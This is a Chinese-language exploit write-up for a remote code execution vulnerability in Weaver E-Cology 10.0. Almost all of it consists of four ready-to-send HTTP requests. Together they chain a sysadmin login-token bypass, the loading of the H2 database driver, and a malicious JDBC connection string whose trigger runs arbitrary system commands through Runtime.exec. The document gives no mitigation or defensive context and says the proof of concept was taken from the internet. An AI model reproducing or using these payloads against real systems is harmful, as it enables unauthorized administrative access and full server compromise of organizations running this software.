F6-14泛微-E-Cology-RCE

漏洞描述：

泛微Ecology-10.0存在远程代码执行漏洞，该漏洞通过Ecology-10.0获取管理员访问令牌，然后通过JDBC反序列化和实现RCE,系统必须依赖于 H2 数据库，该POC来自于网络，自行判断。

漏洞复现：

1.获取serviceTicketId
payload：

POST /papi/passport/rest/appThirdLogin HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Content-Length: 51

username=sysadmin&service=1&ip=1&loginType=third

2.获取data
payload：

POST /papi/passport/login/generateEteamsId HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Content-Length: 56

stTicket={{serviceTicketId}}

3.加载 org.h2.Driver 数据库驱动类
payload：

POST /api/bs/iaauthclient/base/save HTTP/1.1
Host: 
Content-Length: 86
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Content-Type: application/json
Accept: */*
Origin: http://ip
Referer: http://ip/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
ETEAMSID: {{data}}

{"isUse":1,"auth_type":"custom","iaAuthclientCustomDTO":{"ruleClass":"org.h2.Driver"}}

4.执行系统命令
payload：

POST /api/dw/connSetting/testConnByBasePassword HTTP/1.1
Host: 
Content-Length: 199
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Content-Type: application/json
Accept: */*
Origin: http://ip
Referer: http://ip/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
ETEAMSID:  {{data}}

{"dbType":"mysql5","dbUrl":"jdbc:h2:mem:test;MODE=MSSQLServer;init = CREATE TRIGGER hhhh BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$ //javascript\njava.lang.Runtime.getRuntime().exec(\"{cmd}\")$$"}